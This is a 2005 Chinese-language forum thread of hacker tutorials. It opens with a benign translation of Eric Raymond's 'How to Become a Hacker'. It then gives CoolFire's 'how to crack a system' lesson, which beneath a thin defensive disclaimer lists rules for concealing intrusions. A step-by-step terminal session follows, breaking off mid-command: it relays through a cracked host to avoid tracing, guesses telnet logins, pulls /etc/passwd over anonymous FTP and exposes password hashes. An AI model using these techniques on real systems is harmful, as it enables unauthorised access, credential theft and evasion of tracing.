黑客教程红宝书~~~(让你从菜鸟变成高手)

白鹤 · 发表于 2005-7-22 22:00:21

<a href="http://mk:@MSITStore:C:Documents%20and%20Settings408-1桌面hacker-class.chm::/jiaoxue1.htm" target="_blank"></a> 黑客成长红宝书制作：武汉.武钢.皮鲁 ghks@163.net

白鹤 · 发表于 2005-7-22 22:01:11

如何成为一位 hacker 这真是一个好问题, 不止是原作者说他被问过很多次, 包括我和许多网络上的朋友们也常有这个困扰. 不过和作者不同的是, 我经常没有一个固定的答案 :p事实上我所能提供也只是自己的经验, 却没有足够的能力来肯定自己的看法是不是正确的. 这份文章应该可以减去大家不少的麻烦 :) 嗯!! 这次自告奋勇当起翻译, 虽然是起于晚上回到住的地方之后很无聊, 可以用来打发时间. 不过我翻了百行之后, 越翻越后悔. 主要是因为面有一些句子实在很难翻译, 这大概是因为我的英文底子不太好的关系吧!! 好不容易, 终于是翻完了. 为让句子更通顺或者是个人误解, 翻译后和原文有些出入, 这方面还请各位大大见谅. :-) Thinker -------------------------------------------------------------------------- 如何成为一位 hacker 为何有这份文件？ 身为 Jargon File 的编辑, 常有一些网络新手发 mail 问我 "如何成为一个厉害的hacker?". 但, 很奇怪的, 似乎没有任何的 FAQs 或 Web documents 说明这么重要的问题, 所以我写了一份我自己的看法. 如果你是以 offline 的方式在看这一份文件的某一个版本, 那么你可以在 "<a href="http://www.ccil.org/~esr/faqs/hacker-howto.html"" target="_blank">http://www.ccil.org/~esr/faqs/hacker-howto.html"</a> 找到这份文件的目前最新版本. 怎么样才算是一位 Hacker ?? 在 Jargon File 有一堆关于 `hacker' 这个名词的定义, 大部份必须是技术上的行家或热衷于解决问题, 克服限制的人. 然而, 如果你想知道如何成为一位 hacker,有两件事是很有关连的. 这可以追溯到几十年前第一台 minicomputer 刚诞生, ARPAnet 实验也刚展开的时代. 那时有一个由程序设计专家和网络名人所组成的, 具有分享特质的文化族群.这种文化的成员创造了 `hacker' 这个名词. 这些 Hacker 建立了 Internet,创造出我们现在使用的 UNIX 操作系统, 他们也使 Usenet 运作起来, 并且让 WorldWide Web 动起来. 如果你是这个文化的一部分, 如果你对这些种种有所供献, 而且这个文化的其它成员也认识你, 并称你为 hacker, 那么你就是一位 hacker. 在精神上, hacker 并不单指(限制于)这种软件 hacker 的文化. 有人也把 hacker的特质发挥在其它领域, 例如: 电子或者音乐方面. 事实上你会发现, 在任何一种科学或艺术的最高境界, 你都可以发现 hacker 的特质. 软件 hacker 们认为,那些类似的精神也都可以称为 "hacker". 有些人还主张 hacker 的通性是独立于任何媒介之上的, 不特别属于任何一种 hacker 所在的环境. 但是, 在这份文件,我们将把重点放在软件 hacker 们所需的技能、态度和发明`hacker' 这个词的分享文化的传统. 在另一个团体, 他们的成员也很大声的称自己为 hacker, 但是他们不是真的 hacker.这些人(大部分是男性青年)专门闯入电脑和入侵电话系统, 真正的 hacker 们称他们为 `cracker', 并且不愿意和他们在一些做任何事. hacker 们认为这些人都是懒惰, 不负责, 并且不够光明正大的, 并且认为能破解安全系统并不能使你成为一位hacker. 但是很不幸的, 很多记者和作家不明究理的使用 `hacker' 这个字来描述cracker 们; 这让真的 hacker 们很忿怒. 基本上, hacker 和 cracker 之间最主要的不同是: hacker 们创造新东西,cracker 们破坏东西. 如果你想要成为一位 hacker, 继续读下去吧. 如果你是想要成为一位 cracker, 那么就去读 alt.2600 newsgroup 并准备在你发现自己并不如想像中那么行时, 给自己一点评价. 所有关于 cracker 的事情就只有这些了. Hacker 态度 Hacker 们解决了问题并创造新东西, 他们相信自由并自愿的互相帮助. 想要被别人接受成为一位 hacker, 你必须发自内心的表现出这种态度. 为了要很自发的表现出这种态度, 你就必须先完全认同这些态度. 如果你只是把学习 hacker 态度这件事当作一种能在这个文化赢得认同的途径,那么你己经乎略了真正的重点. 由衷的接受这些态度是很这要的, 这能帮助你学习并维持你的动机. 就像那些具创造性的艺术一样, 成为一位大师的最有效方法是学习大师们的精神; 并不只是学习知识和情绪而己. 所以, 如果你想要成为一位 hacker, 请反复的做下面的事情, 直到你完全领会它们: 1. 这世上充满著等著被解决的迷人问题. 作为一个 hacker 是充满快乐的, 但这是一种因为努力得到成果所带来的快乐. 努力的成果则带来动机. 成功的运动家的动机则来自于, 使他们的身体不断进化,并把自己推向物理上的极限所带来的快乐. 类似的情形, 要成为 hacker, 你必须要能从解决问题, 精进技术, 和运用知识的过程中感受到一种悸动. 如果你不是天生就能感受到这种悸动的人, 那么, 为了要成为 hacker, 你必须使自己变成这样的人. 否则, 你会发现你的 hacking energy 就会像性, 金钱, 和社交活动一样, 因为分心而被消磨掉. (你也必须为你的学习能力建立一种信念直到你完成你的工作 -- 即使你只处理一小部份, 而你也不知道你到底还要学些什么东西才有辨法解决你的问题, 但是你会努力学习, 准备充足, 以应付下一个问题.) 2. 没有任何人必须一再的解决同一个问题. 富创造力的头脑是贵重而有限的资源. 有这么多迷人的新问题在那等著被解决.因此富创造力的头脑不该被浪费的用来重复发明轮子. 身为一位 hacker, 你必须了解到其它 hacker 们的时间也是很宝贵的 -- 所以,分享资讯, 解决问题和提供解决方案给其它 hacker 以解决新的问题, 这些几乎算是道义上的责任. ( 即使 hacker 们所拥有的大多是从其它 hacker 的身上得来的, 但这并不意谓你必需把你创造的作品全部交出来, 你可以卖出足够数量的产品, 以求得温饱, 给付房租和买电脑设备, 这和 hacker 的价值观并不相违背. 使用你的 hacking 技能以供给一个家庭的生活, 甚至是致富, 只要你仍不忘记你是一位 hacker, 那么这些行为并不会产生予盾. ) 3. 无聊而单调的工作是有害的. Hacker 们(有创造力的人也是一样)永远不该做一些无聊而单调并且愚蠢的反复性工作. 因为, 如果这样的事情发生的话, 这表示他们正在做一些不是他们该做的事-- 解决新的问题. 这样的浪费对任何人而言都是一种伤害. 无聊单调的工作不只是无趣而己, 而且是一种有害的物质. 要做为一位 hacker 要能尽可能的自动避免无聊, 对此你必须有相当的认知. 这不只是为了你自己而已, 也是为了所有的人(尤其是其它的 hacker). (这有一些例外. 有时侯 hacker 们会去做一些被认为无聊或重复性的工作, 当做脑力的训练, 或是为了要学习得某种技能或某种你所没有的特殊经验. 不过这是一种选择, 任何人都不该被强迫面对无聊事. ) 4. 自由才好. hacker 们天性上是反对独*的. 任何一个给你命令的人就能给你一个独*式的工作,并且可以给你一些笨的可以的理由, 停止你解决任何吸引著你的问题. 所以任何独*式的行为都会被挑战, 以免会危害到你和其它的 hacker 们. (这和为反对而反对是不同的, 小孩子是需要被指导和阻止他们犯错. hacker 也会同意接受某些权威, 照著指示做以较短的时间得到他想要的. 不过那是一种有限且理性的协定; ..... ) 专制在监察和保密这些事上是很有效的方法. 这些行使专制的人并不相信自愿性质的合作和资讯分享 -- 他们只相信在他们控制之下的合作关系. 所以, 身为一位 hacker,你必具有一种敌对的天性, 以对抗监察, 秘密和使用外力强迫或迷惑可以信任的人等行为. 你必须以互信做为你行为的基础. 5. 态度并非不等效于能力 要成为一位 hacker, 你必须开始培养这些态度. 但, 如果你只是单独的模仿某一种态度, 这并不能使你成为一位真正的 hacker, 也不会使你成为一位运动冠军或摇滚明星. 因此, 你必须学会猜疑态度和尊敬各种能力. Hacker 们不会想浪费时间在虚华的人的身上, 他们尊敬的是能力 -- 特别是身为 hacker 的能力, 但对于其它方面的能力也是充满敬意. 如果有能力追求一些很少人能弄懂的技术,追求精神上的技巧, 并能集中精神, 那就再好不过了. 如果你尊敬各种的能力, 那么你就会乐于自己发展这些能力 -- 这会使的努力工作和奉献成为一种剌激性的消遣而非一份苦差事. 这对于想要成为 hacker 的人而言, 是很重要的. 一位 Hacker 所需的基本技能 hacker 的精神态度是很重要的, 但技术则更是重要. hacker 的态度虽然是无可取代,但在梦想别的 hacker 开始也叫你 hacker 前, 有些基本的工具和技术是必备的. 随著新科技的发明和旧技术的取代, 这些工具随时间在慢慢的改变. 例如: 以往总是会学会用机器码写程序, 直到最近我们开始使用 HTML. 不过, 在 1996 年末,下面所举的工具是很明显的被需要的: 1. 学习程序设计. 当然, 这是基础的 hacking 技能. 在 1997 年, 理所当然的, 你必须学会 C. 但,如果你只是学一种语言, 那么你不能算是一位 hacker, 了不起只能算是一个programmer. 除此, 你还必须学会学会以独立于任何程序语言之上的概括性观念来思考一件程序设计上的问题. 要成为一位真正的 hacker, 你必须要能在几天之内将manual 内容和你目前己经知道的关连起学会一种新的语言. 也就是说, 你必会学会数个不同的语言. 还了 C 之外, 你至少还要会 LISP 或 Perl (Java 也正在努力的挤上这个名单;译者注: 我很怀疑这份名单说 :p ). 除了几重要的 hacking 常用语言之外,这些语言提供你一些不同的程序设计途径, 并且让你在好的方法中学习. 程序设计是一种复杂的技术, 我没辨法在这提供完整的学习步骤. 但是我能告诉你一些在书本上和课堂上所没有的东西 (有很多, 几乎全部最好的 hacker 们都是自习而来的). (a) 读别人的程序码和 (b) 写程序, 这两项是不错的方法. 学习写程序就像在学习写一种良好的自然语言, 最好的方法是去看一些专家们所写的东西, 然后写一些你自己的东西, 然后读更多, 再写更多 ... 然后一直持续, 一直到你发展出一种属于自己的风格和特色. 要找到好的程序码来看是很一件很困难的事, 因为, 对菜鸟 hacker 们而言, 适于供他们阅读和努力的大型程序的 source 数量很少. 但这事己有了戏剧性的变化了;现在免费的供应的软件、程序设计工具和操作系统(大都公开提供 source, 而且全都是由 hacker 们写成的)到处可看. 进入下一个主题... 2. 取得一个免费的 UNIX , 并学习使用和维护. 我先假设你己经有一部个人电脑或者是可以使用任何一部 (现在的小孩子真幸福，可如此轻易的拥有 :-)). 取得 hacker 技巧的第一个步骤是取得一份 Linux 或者一份免费的 BSD-Unix, 并将它安装在自己的机器, 并使之顺利的运作. 没错, 在这个世界上除了 Unix 之外, 还有其它的操作系统. 但是他们只提供 bianry, 你不能看到他们的程序码, 你也不能修改他们. 想要在 DOS 或 Windows或 MacOS 开始 hacking, 无疑就是要你绑著枷锁跳舞一样. 除此之外, Unix 是 Internet 上的操作系统. 当你在不懂 Unix 的情况下学习使用Internet 时, 你没辨法在不懂 Unix 的情况下成为 Internet 的 hacker. 因为这个原故, 现在的hacker 文化还是很牢固的以 Unix 为中心绕著. (这并不完全是正确的, 而且有些活在旧时代的hacker 甚至也不喜欢这种情形, 但是 Unix 和Internet 之间的共生共成己经到了牢不可破的地步, 即使是 Microsoft 的大块肌肉也没能在上面留下明显的伤痕.) 因些, 把 Unix 装起来吧! (我自己是喜欢 Linux, 但是还有其它的东东可用.) 学习它, 让它运作起来, 让它陪你努力精进. 用他向整个 Internet 喊话. 看程序码,改程序. 有一天你成为一位高竿的 hacker, 你回头往后看时会发现, 你得到比Microsoft 操作系统所能提供的还要好的程序设计工具(包括 C, Lisp和 Perl).而且得到快乐, 并学到比你想像中的还要多的知识. 关于学习 Unix, 在 Loginataka 有更多的资料.(<a href="http://www.ccil.org/~esr/faqs/loginataka.html)" target="_blank">http://www.ccil.org/~esr/faqs/loginataka.html)</a> 看一下 Linux distribution 的目录或 Linux CD, 并把自己交付给它. 3. 学习使用 World Wide Web 并学会写 HTML. 在 hacker 文化创造出来的东西, 大多在他们的活动范围外被使用著, 如, 在工厂和辨公室或大学被漠漠的使用著. 但 Web 是一个很大的例外, 这个 hacker 眼中的大玩具甚至还被政客们接受, 并巧巧的在改变这个世界. 因此(还有很多好的理由),你必须学习 Web. 并不只是学习使用 browser (这太容易了)而己, 还要学会写 HTML 这个 Web 的标签语言. 如果你不知道如何设计程序, 写 HTML 也可以给一些习惯上的帮助.嗯!! 建立 home page 吧! 不过, 有一个 home page 并没任何特别之处能让你成为一位 hacker. Web 上到处都是 home page, 而且大部份都没什么重点, 没什么内容的烂泥 -- 很好看的烂泥巴,但是看起来都一样, 差不多. (<a href="http://www.ccil.org/~esr/html-hell.html)" target="_blank">http://www.ccil.org/~esr/html-hell.html)</a> 为了让你的 page 有其价值, 它必须是有内容的东西 -- 它必须是有趣并且(或者)对其它 hacker 有用处的. Hacker 文化的状况 就像大多数没有经济活动的文化一样, hackerdom 的运作是建立在名望之上. 当你尝试去解决一个有趣的问题时, 你所做事是否有趣, 你的解决方案是不是真的好用, 这些只有你的技术上的同好或前辈准备好为你做评价. 因此, 当你开始玩起 hacker 的游戏时, 你的主要分数是来自其它 hacker 们对你的技术的看法(这就是为什么只当其它的 hacker 都认为你是 hacker 时, 你才算是一位真正的 hacker). 这个事实被人们认为 hacking 是一种孤独的工作的印象所朦敝了; 也被hacker 文化的禁忌(现在己渐渐的朽坏了, 但依然存在) 和存在人们内心动机的自大或特权之间的冲突所朦敝. 具体的说, hackerdom 就是人类学家所说的「天才文化」.你在其中所得到的地位和名望并不来自于支配其它人, 或是因为长的漂亮, 或因为你有一些别人想要的东西, 而是因为你送出东西. 特别是, 你给送出你的时间,你的创造力和你的技术成果. 下面有五种事, 你会因为做了这些事而爱到 hacker 们尊敬: 1. 写免费的软件. 第一种是写那些其它 hacker 们觉的有趣或好用的程序, 并把 source 公开开放给整个 hacker 文化中的人使用. hackerdom 最爱尊敬的是写出大而功能强的程序的人, 而且这程序是广为大家需要的,所以大家都在做用这些程序. 2. 帮忙 test 和 debug 免费的软件 hacker 们也尊敬帮忙 debug 免费软件的人. 在这个不是很完美的世界, 你不可避免的必须花掉大部分的软件发展周期在 debug 阶段上. 这就是为什么在任何免费软件发展者的脑子都会告诉你一件事, 好的 beta 测试者(能很很清楚的描述发生的状况,正确的发现问题出处, 可以容忍测试版本的 bug, 并且能进行一些简单的诊断程序)和红宝石一样贵重. 如果你是一只菜鸟, 试著开始去找一个你有兴趣的正在发展中的程序, 并且成为一位好的 beta 测试者. 从帮忙测试开始, 很自然的你开始帮忙 debug, 进而开始帮忙修改程序. 你将在这过程中学习到很多东西, 并,且和以后可以帮助你的人结下因果. 3. 公布有用的资讯. 另一项好事是收集和过滤有用和有趣的资讯, 整理成 Web page 或 FAQ 之类的文件, 让大家能很容易的收得. 几种主要技术 FAQ 的维护者都能得和免费软件的作者几乎一样多的尊敬. 4. 帮忙维持一些简单的工作. hacker 文化是由一群自愿者维持运作著. 有一些工作很无趣但却必须维持正常运作的, 如: 管理 mailing list, 维护 newsgroup, 维持大的软件供应站台, 推动RFC 和其它技术标准. 做这类的事将会得到很多的尊敬, 因为大家都知道这些工作是很花时间, 但又不像玩弄程序码般有趣. 5. 为 hacker 文化而努力. 最后一项, 你可以为这个文化效劳, 并推广这个文化(例如, 写一份正确的入门手册,教别人如何成为一位 hacker :-)). 在你因为做了前面四件事之一而出名之前, 这不是你该做的事. 正确的说, hacker 文化并没有任何的领导者, 但在这文化有所谓的文化英雄,族群历史学家. 当你在其中混的够久之后, 你也许会成为这之中的一员. 注意:hacker 们并不相信族群, 喧骚自大的长者, 所以成为这样的长者是非常的危险.与其去和别人竞争, 你宁可为自己定位, 给自己一个亲切谱虚的身份. Hacker 和 Nerd(怪胎) 的关系 成为一位 hacker, 你不需要成为令人讨厌的人(Nerd), 反于社会常态. 然而, 这对你而言却是非常有帮助的, 而且有很多 hacker 也是让人讨厌的人. 当一个社会的浪人有益于让你专心在真正重要的事情上面, 例如: 思考和 hacking. 因此, 有很多 hacker 们接受了 `nerd' 这种称呼, 甚至是使用 `geek'(杂耍演员) 这个字眼, 并引以为傲 -- 这是一种说明他们独主于世俗习惯之外的方法. 在 The GeekPage 可找到更多相关的讨论。 (<a href="http://samsara.circus.com/~omni/geek.html)" target="_blank">http://samsara.circus.com/~omni/geek.html)</a> 如果你能够适当的专注于 hacking 这事上面, 并且还保有你的生活, 那很好. 而且现在要做到这样, 比起以前我还是个菜鸟时容易. 主流文化现在也较为 techno-nerd (技术怪胎)所接受. 甚至有越来越多的人认为 hacker 们可以是很好的男朋友, 女朋友,老公和老婆. 在 Girl's Guide to Geek Guys 可找到更多相关的讯息。 (<a href="http://www.bunnyhop.com/BH5/geekguys.html)" target="_blank">http://www.bunnyhop.com/BH5/geekguys.html)</a> 如果你是因为没有生活而想开始 hacking, 那也没关系, 至少你就没有不能专心的问题了. 也许不久之后你就是一位 hacker 了. 风范要点 再一次的强调, 要成为 hacker 就要了解 hacker 的精神. 如果你并不玩电脑, 那么还是有一些事情可以帮助你. 这些不能成为 hacker 的代替品, 不过有不少的 hacker经常做这些事, 并认为这些事和 hacking 的本质有某种基本的关连. * 阅读科学小说, 并参加小说的聚会(这是一个遇到 hacker 和原始 hacker们的好方法). * 学禅, 并且(或者)接触战争的艺术. (钢铁般的纪律似乎很重要.) * 训练你的耳朵对音乐的分析能力, 试著欣赏某种特殊的音乐, 并好好的玩一些乐器或者唱歌. * 增加对于俏皮话和文字游戏的认识. * 加强你的母语写作能力. (有很惊人数量的 hacker, 都是不错的作家. 这包括一位我所知道的最好的 hacker.) 你做越多这些事, 那么你就愈是天生 hacker 的料。 最后, 有一些事千万不要做. * 不要使用愚蠢而夸张的代号(user ID)或化名. * 不要加入 Usenet 的战火 (或者任何地方的). * 不要自称为 `cyberpunk'(电脑捣蛋玩家),也不要浪费任何时间在这么做的人身上. * 不要 post 或 email 一些充满错字或文法错误的文章. 做了这些事的结果只是为你招来大家的责难和批评. Hacker 们的记忆力都很好, 他们会 一直记住你的所做所为, 你可能要花数年的时间才有辨法让他们重新接受你. 其它的资源 Loginataka 有提到一些关于 Unix hacker 的训练和态度. (<a href="http://www.ccil.org/~esr/faqs/loginataka.html)" target="_blank">http://www.ccil.org/~esr/faqs/loginataka.html)</a> 我也写了关于 Hackerdom 历史的简介. (<a href="http://www.ccil.org/~esr/faqs/hacker-hist.html)" target="_blank">http://www.ccil.org/~esr/faqs/hacker-hist.html)</a> Peter Seebach 也维护了一份很不错的 Hacker FAQ, 这份文件是专门给不知道 如何和 hacker 们相处的经理人们看的. (<a href="http://www.solon.com/~seebs/faqs/hacker.html)" target="_blank">http://www.solon.com/~seebs/faqs/hacker.html)</a> 我也写了一份 paper「Cathedral and the Bazaar」, 上面解释 Linux 文化的运作 方式. 你可以在我写的page 上找的到. (<a href="http://www.ccil.org/~esr/writings/index.html)" target="_blank">http://www.ccil.org/~esr/writings/index.html)</a> 常被提出的问题 (FAQ) Q: 你能教我如何 hack 吗? 自从公开这个 page 以来, 我每周都收到很多人来信问"请告诉我所有关于 hacking的事". 但很不幸的, 我没有这个时间或者是精力去做这件事; 我的 hacking project已经用掉我 110% 的时间了. 就算我愿意, 但是基本上, hacking 是一种必须自习而成的生活态度和技术. 你会发现,当真正 hackers 愿意帮助你的同时，你将得不到他们的尊敬，若你求他们把会的东西都直接给你的话。 先学一点东西吧! 表现出你正在努力尝试, 你有能力独立学习的. 然后再带著你所遇到的难题去和 hacker 见面. Q: 我要在那才能找的到一位真的 hacker 并和他们交谈? 很好, 不过很确定的, 不会在 IRC. 就我所能看到的, 那除了骗子和 cracker 之外什么也没有. 最好的方法是找到一个在你附近的 Unix 或 Linux 的使用群, 并加入他们,参加他们的聚会 (在 Linux Users' Group page on Sunite 有一份目录). (<a href="http://unc.sunsite.edu/linux/ldp/lugs.html)" target="_blank">http://unc.sunsite.edu/linux/ldp/lugs.html)</a> Q: 我应该从那一种语言开始学呢? 如果你真的不懂 HTML 的话, 那就从它开始吧. 市面上有很多外表光鲜亮丽的 HTML烂书. 我最喜欢的一本是 HTML: The Definitive Guide. (<a href="http://www.ora.com/catalog/html2/)" target="_blank">http://www.ora.com/catalog/html2/)</a> 如果你已经准备好开始学 programming 了, 我会建议你从 Perl(<a href="http://www.perl.com/)" target="_blank">http://www.perl.com/)</a>或 Python(<a href="http://www.python.org/)" target="_blank">http://www.python.org/)</a>开始. 而 C 是真的很重要, 不过它也真的很难. Q: 我要如何开始呢? 在那能拿到免费的 Unix 呢? 我在这 page 内到处都有指向取得 Linux 的地方. 要成为一位hacker, 你必须要有动机并且主动进取还要独立学习. 就从现在开始吧.... 原著 Eric S. Raymond esr@snark.thyrsus.com译者 Thinker.bbs@bbs.yzu.edu.tw

白鹤 · 发表于 2005-7-22 22:02:01

如何破解系统(1) 这不是一个教学文件, 只是告诉你该如何破解系统, 好让你能够将自己的系统作安全的保护, 如果你能够将这份文件完全看完, 你就能够知道电脑骇客们是如何入侵你的电脑, 我是 CoolFire, 写这篇文章的目的是要让大家明白电脑安全的重要性, 并不是教人 Crack Password 若有人因此文件导致恶意入侵别人的电脑或网路, 本人概不负责 !! #1 甚麽是 Hacking ? 就是入侵电脑! 有甚麽好解释的! 大部份有关介绍 Hacker 的书籍或小说及文件等都有清楚的介绍, 沉迷於电脑的人... 破坏... 唉! 一大堆怪解释就是了, 最好不要成为一个 "骇客", 我... 不是! #2 为甚麽要 Hack ? 我们只是为了要了解更多关於系统的技术, 入侵它, 了解它是如何运作的, 试试它的安全性, 然後学著去使用它, 读取系统中有关操作的说明, 学习它的各项操作 !! 为了安全性而作革命! #3 Hack 守则 1. 不恶意破坏任何的系统, 这样作只会给你带来麻烦. 恶意破坏它人的软体将导致法律刑责, 如果你只是使用电脑, 那仅为非法使用!! 注意: 千万不要破坏别人的软体或资料 !! 2. 不修改任何的系统档, 如果你是为了要进入系统而修改它, 请在答到目的後将它改回原状. 3. 不要轻易的将你要 Hack 的站台告诉你不信任的朋友. 4. 不要在 bbs 上谈论你 Hack 的任何事情. 5. 在 Post 文章的时候不要使用真名. 6. 正在入侵的时候, 不要随意离开你的电脑. 7. 不要侵入或破坏政府机关的主机. 8. 不在电话中谈论你 Hack 的任何事情. 9. 将你的笔记放在安全的地方. 10. 想要成为 Hacker 就要真正的 Hacking, 读遍所有有关系统安全或系统漏洞的文件 (英文快点学好)! 11. 已侵入电脑中的帐号不得清除或修改. 12. 不得修改系统档案, 如果为了隐藏自己的侵入而作的修改则不在此限, 但仍须维持原来系统的安全性, 不得因得到系统的控制权而将门户大开 !! 13. 不将你已破解的帐号分享与你的朋友. #4 破解之道 1. 进入主机中 2. 得到 /etc/passwd 3. 得到系统帐号 4. 得到最高权限 -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 1. 进入主机有好几种方式, 可以经由 Telnet (Port 23) 或 SendMail (Port 25)或 FTP 或 WWW (Port 80) 的方式进入, 一台主机虽然只有一个位址, 但是它可能同时进行多项服务, 所以如果你只是要 "进入" 该主机, 这些 Port 都是很好的进行方向. 当然还有很多 Port, 但是 DayTime 的 Port 你能拿它作甚麽??? 我不知道, 你知道吗?! 底下的示范并不是像写出来的那麽容易, 只不过是要让你了解如何进入, 当然其中还有很多问题, 如打错指令...... 等等的毛病... 没有出现在课堂上, 但是我为了面子.... 一定要删掉这些不堪入目的东西嘛... 示范进入主机的方法: (By CoolFire) (首先要先连上某一台你已经有帐号的 Telnet 主机, 当然最好是假的, 也就是 Crack过的主机, 然後利用它来 Crack 别的主机, 才不会被别人以逆流法查出你的所在) Digital UNIX (ms.hinet.net) (ttypa) login: FakeName Password: Last login: Mon Dec 2 03:24:00 from 255.255.0.0 (我用的是 ms.hinet.net ... 当然是假的罗, 都已经经过修改了啦 !!没有这一台主机啦 !! 别怕 ! 别怕 ! 以下的主机名称都是假的名称, 请同学们要记得 !!) Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996 Digital UNIX V1.2C Worksystem Software (Rev. 248) Digital UNIX Chinese Support V1.2C (rev. 3) (嗯... 进来了 ! 开始攻击吧 ! 本次的目标是......) ms.hinet.net> telnet <a href="http://www.fuckyou.hinet.net" target="_blank"><a href="http://www.fuckyou.hinet.net" target="_blank">www.fuckyou.hinet.net</a></a> (Telnet 试试看....) Trying 111.222.255.255... Connected to cool.fuckyou.hinet.net. Escape character is '^]'. Password: Login incorrect (没关系, 再来 !!) cool login: hinet Password: Login incorrect cool login: (都没猜对, 这边用的是猜的方法, 今天运气好像不好) telnet> close Connection closed. (重来, 换个 Port 试试看 !!) ms.hinet.net> telnet 111.222.255.255 80 Trying 111.222.255.255... Connected to 111.222.255.255. Escape character is '^]'. <HTML> <HEAD> <TITLE>Error</TITLE> </HEAD> <BODY> <H1>Error 400</H1> Invalid request "" (unknown method) <HR><ADDRESS><A HREF="<a href="http://www.w3.org">CERN-HTTPD" target="_blank">http://www.w3.org">CERN-HTTPD</a> 3.0A</A></ADDRESS> </BODY> </HTML> Connection closed by foreign host. (哇哩 !! 连密码都没得输入, 真是..... 再来 !! 要有恒心 !!) (换 FTP Port 试试) ms.hinet.net> ftp 111.222.255.255 Connected to 111.222.255.255. 220 cool FTP server (Version wu-2.4(1) Tue Aug 8 15:50:43 CDT 1995) ready. Name (111.222.255.255:FakeName): anonymous 331 Guest login ok, send your complete e-mail address as password. Password: 230-Welcome, archive user! This is an experimental FTP server. If have any 230-unusual problems, please report them via e-mail to root@cool.com 230-If you do have problems, please try using a dash (-) as the first character 230-of your password -- this will turn off the continuation messages that may 230-be confusing your ftp client. 230- 230 Guest login ok, access restrictions apply. Remote system type is UNIX. Using binary mode to transfer files. (哇 ! 可以用 anonymous 进来耶!! password 部份输入 aaa@ 就好了 ! 不要留下足迹喔!!) ftp> ls 200 PORT command successful. 150 Opening ASCII mode data connection for file list. etc pub usr bin lib incoming welcome.msg 226 Transfer complete. (嗯嗯... 太好了 ! 进来了 !! 下一个目标是.....) ftp> cd etc 250 CWD command successful. ftp> get passwd (抓回来 !!) 200 PORT command successful. 150 Opening BINARY mode data connection for passwd (566 bytes). 226 Transfer complete. 566 bytes received in 0.56 seconds (0.93 Kbytes/s) (喔... 这麽容易吗??) ftp> !cat passwd (看看 !!!) root::0:0:root:/root:/bin/bash bin:*:1:1:bin:/bin: daemon:*:2:2:daemon:/sbin: adm:*:3:4:adm:/var/adm: lp:*:4:7:lp:/var/spool/lpd: sync:*:5:0:sync:/sbin:/bin/sync shutdown:*:6:0:shutdown:/sbin:/sbin/shutdown halt:*:7:0:halt:/sbin:/sbin/halt mail:*:8:12:mail:/var/spool/mail: news:*:9:13:news:/var/spool/news: uucp:*:10:14:uucp:/var/spool/uucp: operator:*:11:0:operator:/root:/bin/bash games:*:12:100:games:/usr/games: man:*:13:15:man:/usr/man: postmaster:*:14:12:postmaster:/var/spool/mail:/bin/bash ftp:*:404:1::/home/ftp:/bin/bash (哇哩... 是 Shadow 的... 真是出师不利.... ) ftp> bye 221 Goodbye. (不信邪.... 还是老话, 要有恒心....) (FTP 不行, 再 Telnet 看看 !!) ms.hinet.net> telnet <a href="http://www.fuckyou.hinet.net" target="_blank"><a href="http://www.fuckyou.hinet.net" target="_blank">www.fuckyou.hinet.net</a></a> Trying 111.222.255.255... Connected to cool.fuckyou.hinet.net. Escape character is '^]'. Password: Login incorrect (又猜错 !!) cool login: fuckyou Password: Last login: Mon Dec 2 09:20:07 from 205.11.122.12 Linux 1.2.13. Some programming languages manage to absorb change but withstand progress. cool:~$ (哇哈哈 !! 哪个笨 root, 用 system name 作 username 连 password 也是 system name.... 总算... 没白玩...) cool:~$ system bash: system: command not found (嗯... 这个 user 的权限好像不大....) cool:~$ ls cool:~$ pwd /home/fuckyou cool:~$ cd / cool:/$ ls Public/ cdrom/ lib/ mnt/ tmp/ www/ README dev/ linux* proc/ usr/ bin/ etc/ local/ root/ var/ boot/ home/ lost+found/ sbin/ cool:/$ cd etc telnet> quit (好想睡呀 !! 不玩了 !! 下节课再开始....) Connection closed. ms.hinet.net> exit (走了 !! 下节课在见啦 !! 今天就上到这里 ! 老师要先下班了 !!) (有学生说: 骗人! 还没有破解呀!! 胡说 ! 不是已经进来了吗 ??? 看看这节课上的是甚麽??? ---->进入主机 !! 嗯.....) -*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*-*- How 2. 上节课抓回来一个 "乱七八糟" 的 /etc/passwd, 你以为我的真那麽笨吗?? guest 所抓回来的能是甚麽好东西?? 所以这一节课继续上次的攻击行动. 上节课我们已经 "猜" 到了一个不是 guest 的 username 及 password. 今天就以它来进入主机瞧瞧!! Digital UNIX (ms.hinet.net) (ttypa) login: FakeName Password: Last login: Mon Dec 2 03:24:00 from 255.255.0.0 Digital UNIX V1.2C (Rev. 248); Mon Oct 31 21:23:02 CST 1996 Digital UNIX V1.2C Worksystem Software (Rev. 248) Digital UNIX Chinese Support V1.2C (rev. 3) (嗯... 进来了 ! 开始攻击吧 ! 本次的目标是.....呵...) ms.hinet.net> telnet cool.fuckyou.hinet.net (Telnet 试试看.... 昨天的位址, 有作笔记吧!) stsvr.showtower.com.tw> telnet cool.fuckyou.hinet.net Trying 111.222.255.255... Connected to cool.fuckyou.hinet.net. Escape character is '^]'. Password: Login incorrect cool login: fuckyou Password: (一样输入 fuckyou) Last login: Mon Dec 1 12:44:10 from ms.hinet.net Linux 1.2.13. cool:~$ cd /etc cool:/etc$ ls DIR_COLORS ftpusers localtime resolv.conf HOSTNAME gateways magic rpc NETWORKING group mail.rc securetty NNTP_INEWS_DOMAIN host.conf motd sendmail.cf X11@ hosts messages/ sendmail.st XF86Config hosts.allow mtab services at.deny hosts.deny mtools shells bootptab hosts.equiv named.boot shutdownp csh.cshrc hosts.lpd networks snoopy/ csh.login httpd.conf nntpserver slip.hosts exports inetd.conf passwd snooptab fastboot inittab passwd.OLD syslog.conf fdprm issue passwd.old syslog.pid fstab ld.so.cache printcap ttys ftpaccess ld.so.conf profile utmp@ (找寻目标..... 太乱了 ! 懒得找, 再来 ....) cool:/etc$ ls pa* passwd passwd.OLD passwd.old (果然在) cool:/etc$ more passwd (看看有没有 Shadow...) root:acqQkJ2LoYp:0:0:root:/root:/bin/bash john:234ab56:9999:13:John Smith:/home/john:/bin/john (正点 ! 一点都没有防备 !!) cool:/etc$ exit logout (走了!.... 换 FTP 上场 !!) Connection closed by foreign host. ms.hinet.net> ftp <a href="http://www.fuckyou.hinet.net" target="_blank"><a 